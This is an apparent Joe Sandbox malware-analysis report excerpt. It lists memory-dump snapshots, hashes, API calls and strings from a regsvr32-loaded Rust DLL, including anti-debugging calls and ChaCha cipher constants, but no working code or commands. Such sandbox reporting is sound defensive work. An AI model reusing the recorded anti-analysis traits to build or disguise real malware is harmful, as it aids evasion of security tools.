                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: FindVolume$DiskFirstFreeNextSpacememcpymemset
                                                                  • String ID:
                                                                  • API String ID: 478406750-0
                                                                  • Opcode ID: 08419eaad0cd0fe01798cb32864c54f951efd0c9f5deb8dd8abe9b0dd5f3a510
                                                                  • Instruction ID: da7af3e1513c4ec3e87e2c30a22d9fd2d2bef169411a7f9cf8c3a48bc85b7767
                                                                  • Opcode Fuzzy Hash: 08419eaad0cd0fe01798cb32864c54f951efd0c9f5deb8dd8abe9b0dd5f3a510
                                                                  • Instruction Fuzzy Hash: 0BC135B1D002089BDB20CF69DD45BEEB7F4AFA5718F108829E915B7B81E771D904CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +NaNinf00e00E0assertion failed: ndigits > 0$assertion failed: buf.len() >= MAX_SIG_DIGITS$assertion failed: d.mant + d.plus < (1 << 61)$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: edelta >= 0core\src\num\diy_float.rs
                                                                  • API String ID: 0-3329680326
                                                                  • Opcode ID: b9231439ab1b7a29a3475a3a3590164ae4348f0aa7848132ef20e1b866603136
                                                                  • Instruction ID: d26299cda1a03273a436e9fa9f94d0879db3b98a72d63ca9eab91ebd5e7ece57
                                                                  • Opcode Fuzzy Hash: b9231439ab1b7a29a3475a3a3590164ae4348f0aa7848132ef20e1b866603136
                                                                  • Instruction Fuzzy Hash: 6B325976A183119FC704CF29C88075AFBE2BFC8754F198A2DF899A7755D734E8058B82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2-by$expa$expand 3$nd 32-by$te k2-by$te k2-byexpate knd 3$te knd 3expa
                                                                  • API String ID: 0-1772262818
                                                                  • Opcode ID: 1391a8e0975a9adc2b0a8bfe7d6b8fa79609e5bb0249d7250758481f8c467e98
                                                                  • Instruction ID: 08193c45febc1764affb7e7c13b93f0922b3e506d6928dbd7107ffd96ffed1ed
                                                                  • Opcode Fuzzy Hash: 1391a8e0975a9adc2b0a8bfe7d6b8fa79609e5bb0249d7250758481f8c467e98
                                                                  • Instruction Fuzzy Hash: 42E244B0D012288FDB64CFA9C984BCDFBF1BF88314F6581AAD409B7215D7706A968F54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2-by$expa$expand 3$nd 32-by$te k2-by$te k2-byexpate knd 3$te knd 3expa
                                                                  • API String ID: 0-1772262818
                                                                  • Opcode ID: 1391a8e0975a9adc2b0a8bfe7d6b8fa79609e5bb0249d7250758481f8c467e98
                                                                  • Instruction ID: 7bd5b078ada9131d29cf46fe95bff84206cbbb035bd6f96314bc3281fa213f11
                                                                  • Opcode Fuzzy Hash: 1391a8e0975a9adc2b0a8bfe7d6b8fa79609e5bb0249d7250758481f8c467e98
                                                                  • Instruction Fuzzy Hash: E9E244B0D012288FDB64CFA9C984BCDFBF1BF88314F6581AAD409B7215D7706A968F54
                                                                  APIs
                                                                  Strings
                                                                  • assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0assertion failed: !d.is_zero()_, xrefs: 6C935777
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0assertion failed: !d.is_zero()_
                                                                  • API String ID: 2221118986-1476291318
                                                                  • Opcode ID: fdfebcdd1445896f6ffe852fbbeb34a0f480f87d7c030d5c9626ee6581ae59d3
                                                                  • Instruction ID: 95463f18fbc136902e29b89f8300fe75917613bfabed1e730f5973a0f382047d
                                                                  • Opcode Fuzzy Hash: fdfebcdd1445896f6ffe852fbbeb34a0f480f87d7c030d5c9626ee6581ae59d3
                                                                  • Instruction Fuzzy Hash: B4520471A0122A9FCB14CF58C880BFEB7B5FF9A314F555629E81AAB740D731E945CB80
                                                                  APIs
                                                                  Strings
                                                                  • assertion failed: t.get().is_null(), xrefs: 6C89E08F
                                                                  • assertion failed: t.get().eq(&(self as *const _)), xrefs: 6C89E042
                                                                  • bdep, xrefs: 6C89DD46
                                                                  • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6C89E031, 6C89E07E
                                                                  • bdep, xrefs: 6C89DD2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: assertion failed: t.get().eq(&(self as *const _))$assertion failed: t.get().is_null()$bdep$bdep$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
                                                                  • API String ID: 2221118986-765718192
                                                                  • Opcode ID: e6681d3a80cb5f219b31076d762477da58540607ce93156e616fa04fd8d6f432
                                                                  • Instruction ID: 74ca3ecf78bc054ceda04b7e8512d62be263770a63bf3255148edfc41b83a2f9
                                                                  • Opcode Fuzzy Hash: e6681d3a80cb5f219b31076d762477da58540607ce93156e616fa04fd8d6f432
                                                                  • Instruction Fuzzy Hash: 24D1B276E002199BDB14CFA9C8417EFF7B2BF88314F1A853AD919AB740DB7599018BD0
                                                                  APIs
                                                                  Strings
                                                                  • assertion failed: !buf.is_empty(), xrefs: 6C927ECE
                                                                  • assertion failed: d.mant > 0, xrefs: 6C927EAC
                                                                  • +NaNinf00e00E0assertion failed: ndigits > 0, xrefs: 6C9279B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: +NaNinf00e00E0assertion failed: ndigits > 0$assertion failed: !buf.is_empty()$assertion failed: d.mant > 0
                                                                  • API String ID: 2221118986-682178742
                                                                  • Opcode ID: dd48bb415d4632f2a2502827cf95a01dc710e429810868cfbe6e14193c015ff1
                                                                  • Instruction ID: 27e8ade65bd75d9956f593a9494461de4bcdea6d245172489579eb845f8e864f
                                                                  • Opcode Fuzzy Hash: dd48bb415d4632f2a2502827cf95a01dc710e429810868cfbe6e14193c015ff1
                                                                  • Instruction Fuzzy Hash: 8132BF72F002198FCB04CE68C890BEEB7F6AF88354F198529E855B7794D634DD45CB90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: \u$\u${${$}$}
                                                                  • API String ID: 0-582841131
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <$D=H=$P=T=$\=`=$h=l=
                                                                  • API String ID: 0-2826345987
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 02637A14
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02637A29
                                                                  • UnhandledExceptionFilter.KERNEL32(0264534C), ref: 02637A34
                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 02637A50
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 02637A57
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                  • String ID:
                                                                  • API String ID: 2579439406-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: 0$0
                                                                  • API String ID: 2221118986-203156872
                                                                  APIs
                                                                  • CallNtPowerInformation.POWRPROF(0000000B,00000000,00000000,00000004,?), ref: 6C85C787
                                                                  • GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,00000000), ref: 6C85C86B
                                                                  • GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000001,00000000,0000FFFF,00000000,00000000), ref: 6C85C8D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Information$LogicalProcessor$CallPower
                                                                  • String ID:
                                                                  • API String ID: 2272075218-0
                                                                  Strings
                                                                  • call<searcher kind union>, xrefs: 6C8818ED
                                                                  • Prefilter<prefilter function>, xrefs: 6C8818D0
                                                                  • kind, xrefs: 6C881907
                                                                  • rarest_byterarest_offsetC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\memchr-2.7.4\src\memmem\mod.rs, xrefs: 6C881920
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Prefilter<prefilter function>$call<searcher kind union>$kind$rarest_byterarest_offsetC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\memchr-2.7.4\src\memmem\mod.rs
                                                                  • API String ID: 0-2748652549
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: .0.$assertion failed: !buf.is_empty()$assertion failed: buf[0] > b'0'$eEe-E--+NaNinf00e00E0assertion failed: ndigits > 0
                                                                  • API String ID: 2221118986-3378266233
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: l)\%
                                                                  • API String ID: 2221118986-975318231
                                                                  APIs
                                                                  • memcpy.MSVCRT(?,?,00000080), ref: 6C896918
                                                                  • memcpy.MSVCRT(00000080,00000080,00000080,00000080,6C97DC9C), ref: 6C896C3D
                                                                  • memcpy.MSVCRT(00000080,6C97DC8C,00000080,00000000,4388800C,00000080,6C97DC9C,4388800C,?,6C97DC8C,00000080,6C97DC9C), ref: 6C896D2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  Strings
                                                                  • nd 3expa, xrefs: 6C8A9894
                                                                  • te kexpate k2-byte kte k2-by2-bynd 3nd 3expa2-byexpand 3, xrefs: 6C8A9846
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: nd 3expa$te kexpate k2-byte kte k2-by2-bynd 3nd 3expa2-byexpand 3
                                                                  • API String ID: 0-2854347106
                                                                  • Opcode ID: fefa4fb2c76f4587aa34108c62916a1e4618eeeb307a88ff3978be32e249b1c5
                                                                  • Instruction ID: 905caa5b6ee3ef6935d9699a0a27fe7ee6070f1b79786ee1ba2f48d5366b5af2
                                                                  • Opcode Fuzzy Hash: fefa4fb2c76f4587aa34108c62916a1e4618eeeb307a88ff3978be32e249b1c5
                                                                  • Instruction Fuzzy Hash: 86E25AB0D012288FDB68CF99C984BDDFBB1BF88314F6581AAD409B7215D7346A86CF54
                                                                  APIs
                                                                  • memset.MSVCRT ref: 6C86F4E9
                                                                  • RtlGetVersion.NTDLL ref: 6C86F502
                                                                    • Part of subcall function 6C85B650: PdhOpenQueryA.PDH(00000000,00000000,?,?,00000000,00000000), ref: 6C85B66A
                                                                    • Part of subcall function 6C85B650: PdhAddEnglishCounterA.PDH(00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6C85B688
                                                                    • Part of subcall function 6C85B650: PdhCloseQuery.PDH(00000000,00000000,00000005,00000000,00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?), ref: 6C85B694
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Query$CloseCounterEnglishOpenVersionmemset
                                                                  • String ID:
                                                                  • API String ID: 3694610374-0
                                                                  • Opcode ID: ad6172dee7474d367a162037de6e78bf8e0dd2d7f945af1b3396c84212e8acb7
                                                                  • Instruction ID: 5042d55fb99872084ca3a44aa60189648b97eeffa6cfd9f2099d7a772724b923
                                                                  • Opcode Fuzzy Hash: ad6172dee7474d367a162037de6e78bf8e0dd2d7f945af1b3396c84212e8acb7
                                                                  • Instruction Fuzzy Hash: DA21D135C00B1C9BC721DF28D9067D6B7B4AF2B354F004A99EA89ABA52E730D954CBD1
                                                                  Strings
                                                                  • a formatting trait implementation returned an error when the underlying stream did notalloc\src\fmt.rs, xrefs: 6C9218C6
                                                                  • called `Result::unwrap()` on an `Err` valueErrorLayoutError, xrefs: 6C92194D
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: a formatting trait implementation returned an error when the underlying stream did notalloc\src\fmt.rs$called `Result::unwrap()` on an `Err` valueErrorLayoutError
                                                                  • API String ID: 3510742995-4199672088
                                                                  • Opcode ID: d0ddd8f147164b496733aa39f8eb9b90362b7c7f4e51611bd1a30993a90b7bcc
                                                                  • Instruction ID: b9c2892d910f6c96e4ba427420baa3ca85bb0e6258c586dcf79fdf91010fdd52
                                                                  • Opcode Fuzzy Hash: d0ddd8f147164b496733aa39f8eb9b90362b7c7f4e51611bd1a30993a90b7bcc
                                                                  • Instruction Fuzzy Hash: 6D12BC72E212158BDB05CE28C8406FEB3B5AF97344F15832AE89477B49E73ACE51C380
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?$@
                                                                  • API String ID: 0-1463999369
                                                                  • Opcode ID: 6663654e2d044be12261c58b45630c1dd4e63eb8e6d5ab9232d8feab286bbbc2
                                                                  • Instruction ID: 573fa89eb4c0a3ba1c0f31ccda5769e234fcc6ce1381dbefea5137cd957c3ac4
                                                                  • Opcode Fuzzy Hash: 6663654e2d044be12261c58b45630c1dd4e63eb8e6d5ab9232d8feab286bbbc2
                                                                  • Instruction Fuzzy Hash: 9612D671E00B598FCB15CF68C880AAEB7B6FF9A344F15875AD9197F212CB309941CB54
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: df4de7710fe018ec3ee80e162d77957de5a28084c256419e7028bbd318eac088
                                                                  • Instruction ID: 778b9135aa8141738b7442e99f492ed95e72af4b05324bf087d4ea9c99207853
                                                                  • Opcode Fuzzy Hash: df4de7710fe018ec3ee80e162d77957de5a28084c256419e7028bbd318eac088
                                                                  • Instruction Fuzzy Hash: 2D1235319082A6CFCB25CF6CC4905ADFFF1BF56300B19869DD8A46B792E7349944CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
